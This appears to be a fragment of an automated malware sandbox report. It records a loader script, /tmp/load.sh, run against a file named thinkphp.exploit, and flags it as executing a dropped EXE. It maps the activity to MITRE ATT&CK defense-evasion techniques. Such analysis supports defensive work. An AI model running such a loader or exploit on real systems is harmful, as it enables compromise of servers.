  - /tmp/load.sh: ./load.sh thinkphp.exploit (PID 1590)
    - Executes dropped EXE
MITRE ATT&CK Enterprise v15
- Defense Evasion
  - File and Directory Permissions Modification (1)
    - Linux and Mac File and Directory Permissions Modification (1)
  - Impair Defenses (1)
Downloads